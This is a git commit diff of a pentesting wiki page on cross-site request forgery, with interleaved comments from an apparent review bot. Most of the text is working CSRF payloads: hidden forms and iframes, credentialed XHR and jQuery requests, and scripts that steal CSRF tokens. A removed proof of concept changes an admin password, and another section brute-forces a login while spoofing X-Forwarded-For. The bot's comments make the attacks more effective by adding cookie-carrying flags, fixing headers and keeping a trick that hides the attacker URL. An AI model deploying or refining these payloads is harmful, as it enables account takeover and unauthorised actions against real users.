GitBook: [master] one page modified

This commit is contained in:
CPol 2021-06-05 01:10:15 +00:00 committed by gitbook-bot
parent 3822d83563
commit b491b5e008
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF


@ -113,7 +113,7 @@ https://hahwul.com/.white_domain_com (X)
If a **CSRF token** is being used as **defence** you could try to **ex-filtrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability. If a **CSRF token** is being used as **defence** you could try to **ex-filtrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability.
### **Make a GET request using** _**img**_ **tag** ### **GET using HTML tags**
```markup ```markup
<img src=http://google.es?param=VALUE style="display:none" /> <img src=http://google.es?param=VALUE style="display:none" />
@ -125,7 +125,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
![](../.gitbook/assets/image%20%28509%29.png) ![](../.gitbook/assets/image%20%28509%29.png)
### Make a GET request using a form ### Form GET request
```markup ```markup
<html> <html>
@ -143,7 +143,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
</html> </html>
``` ```
### Make a POST request using a form ### Form POST request
```markup ```markup
<html> <html>
@ -161,7 +161,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
</html> </html>
``` ```
### Make a POST request using a form without changing page ### Form POST request through iframe
```markup ```markup
<!-- <!--
@ -181,7 +181,7 @@ The request is sent through the iframe withuot reloading the page
</html> </html>
``` ```
### **Make a Post request using Ajax** ### **Ajax POST request**
```markup ```markup
<script> <script>
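Review bot: The paragraph carried in this hunk's context ("The request is sent through the iframe withuot reloading the page") has a typo, "withuot" for "without"; since the heading below it is being reworded anyway, fix the sentence in the same commit.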
@ -194,13 +194,23 @@ else
{// code for IE6, IE5 {// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP"); xh=new ActiveXObject("Microsoft.XMLHTTP");
} }
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile"); xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this) xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on"); xh.send("username=abcd&status=on");
</script> </script>
<script>
//JQuery version
$.ajax({
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
})
</script>
``` ```
### POST request using multipart/form-data content type ### multipart/form-data POST request
```javascript ```javascript
myFormData = new FormData(); myFormData = new FormData();
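Review bot: The added jQuery variant does not set `xhrFields: { withCredentials: true }`, so unlike the raw XHR just above it (which now sets `xh.withCredentials = true;`) it will not attach the victim's cookies on a cross-origin POST and the CSRF will silently do nothing; add `xhrFields: { withCredentials: true }` to the `$.ajax` options, and note that the snippet also assumes jQuery is already loaded on the attacker page. Separately, the comment on the `setRequestHeader('Content-type', ...)` line calling the header "optional" is misleading: without it `xh.send("username=abcd&status=on")` goes out as `text/plain;charset=UTF-8`, which most form handlers will not parse, so the header is required for this payload to be read as form fields (it stays CORS-safelisted either way, so no preflight is triggered).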
@ -213,12 +223,13 @@ fetch("http://example/some/path", {
}); });
``` ```
### POST request using multipart/form-data content type x2 ### multipart/form-data POST request v2
```javascript ```javascript
var fileSize = fileData.length, var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC", boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest(); xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true); xhr.open("POST", url, true);
// MIME POST request. // MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
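Review bot: The `Content-Type` value in this hunk's context, `"multipart/form-data, boundary="+boundary`, separates the parameter with a comma; the parameter separator in a media type is a semicolon, so it should be `"multipart/form-data; boundary="+boundary` or the server will not locate the boundary. Since the hunk already touches this request setup to add `xhr.withCredentials = true;` (correctly, before `open` is allowed), fix the separator here too; `xhr.sendAsBinary` further down is a non-standard, removed API and the FormData/`fetch` variant in the previous section is the portable one.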
@ -233,7 +244,7 @@ body += "--" + boundary + "--";
xhr.sendAsBinary(body); xhr.sendAsBinary(body);
``` ```
### **Make a Post request using a Form and Iframe in 2 separated files** ### Form POST request from within an iframe
```markup ```markup
<--! expl.html --> <--! expl.html -->
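Review bot: `<--! expl.html -->` in the context of this hunk is not a valid HTML comment (the opener must be `<!--`); as written browsers treat it as a bogus comment/text and it can swallow the following markup. Change it to `<!-- expl.html -->` while retitling this section.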
@ -253,12 +264,13 @@ function envia(){document.getElementById("formulario").submit();}
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1> <h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
``` ```
### **Get a CSRF Token and send a Post request \(x-www-form-urlencoded\) using Ajax** ### **Steal CSRF Token and send a POST request**
```javascript ```javascript
function submitFormWithTokenJS(token) { function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest(); var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true); xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;
// Send the proper header information along with the request // Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
@ -277,6 +289,7 @@ function getTokenJS() {
var xhr = new XMLHttpRequest(); var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document // This tels it to return it as a HTML document
xhr.responseType = "document"; xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous // true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true); xhr.open("GET", GET_URL, true);
xhr.onload = function (e) { xhr.onload = function (e) {
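Review bot: Adding `xhr.withCredentials = true;` to `getTokenJS` makes the browser send cookies, but it does not make the response readable: with `responseType = "document"` the cross-origin `responseXML` stays `null` unless the target answers with `Access-Control-Allow-Origin: <attacker origin>` and `Access-Control-Allow-Credentials: true`. The section heading promises to "Steal CSRF Token", so state that this only works against a CORS misconfiguration (or from a same-origin page, e.g. via XSS) and otherwise the token read in `onload` fails; the page's own earlier note about exfiltrating the token via XSS or Dangling Markup is the realistic path.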
@ -300,7 +313,7 @@ var POST_URL="http://google.com?param=VALUE"
getTokenJS(); getTokenJS();
``` ```
### **Get a CSRF Token and send a Post request using an iframe, a form and Ajax** ### **Steal CSRF Token and send a Post request using an iframe, a form and Ajax**
```markup ```markup
<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data"> <form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
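Review bot: The new heading keeps "Post request" while the sibling headings renamed in this commit use "POST request"; normalize to "POST" for consistency.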
@ -322,7 +335,7 @@ function f1(){
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe> <iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
``` ```
### **Get a CSRF Token with an iframe and write inside the iframe a form a send it** ### **Steal CSRF Token and sen a POST request using an iframe and a form**
```markup ```markup
<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe> <iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>
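Review bot: Typo in the new heading: "sen a POST request" should be "send a POST request". The `read()` handler wired to the iframe's `onload` here only works when the attacker page is same-origin with the framed URL, otherwise accessing the iframe's document throws a SecurityError; worth a sentence under the heading so readers do not expect it to work cross-site.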
@ -342,7 +355,7 @@ function read()
</script> </script>
``` ```
### **Use 2 iframes: get the token with one and send the post request with the other** ### **Steal token and send it using 2 iframes**
```markup ```markup
<script> <script>
@ -374,7 +387,7 @@ height="600" width="800"></iframe>
</form> </form>
``` ```
### **Get a CSRF token with Ajax and send a post with a form** ### **POSTSteal CSRF token with Ajax and send a post with a form**
```markup ```markup
<body onload="getData()"> <body onload="getData()">
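Review bot: The new heading reads "POSTSteal CSRF token with Ajax ..."; the stray "POST" prefix looks like a leftover from editing and should be dropped so it reads "Steal CSRF token with Ajax and send a POST with a form".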
@ -389,6 +402,7 @@ height="600" width="800"></iframe>
<script> <script>
var x = new XMLHttpRequest(); var x = new XMLHttpRequest();
function getData() { function getData() {
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true); x.open("GET","http://google.com?param=VALUE",true);
x.send(null); x.send(null);
} }
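Review bot: Setting `x.withCredentials = true;` before `x.open` is fine (allowed in the UNSENT state), but as with the other Ajax token-stealing snippets the GET response can only be read cross-origin if the target reflects the attacker origin in `Access-Control-Allow-Origin` together with `Access-Control-Allow-Credentials: true`; add that caveat next to the heading so the credentialed request is not mistaken for a general bypass.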
@ -425,26 +439,6 @@ socket.on('connect', () => {
</script> </script>
``` ```
### Make POST Form request invisible with invisible Iframe
```markup
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form action="https://example.com/admin/changepassword" method="POST" style="display:none" target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible" >
<input type="hidden" name="password" value="hacktricks" />
<input type="hidden" name="password2" value="hacktricks" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
## CSRF Login Brute Force ## CSRF Login Brute Force
The code can be used to Brut Force a login form using a CSRF token \(It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting\): The code can be used to Brut Force a login form using a CSRF token \(It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting\):
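Review bot: This hunk deletes the whole "Make POST Form request invisible with invisible Iframe" section with no mention in the commit message ("one page modified"). The retained "Form POST request through iframe" section covers the hidden named-target iframe, so the removal reads as de-duplication, but the dropped block was the only place showing `history.pushState('', '', '/')` to scrub the attacker URL from the history entry before submitting; either fold that one line into the retained section or say in the commit message that the Burp-generated PoC was removed as a duplicate. Also, the context line "Brut Force" in the following section should be "Brute Force".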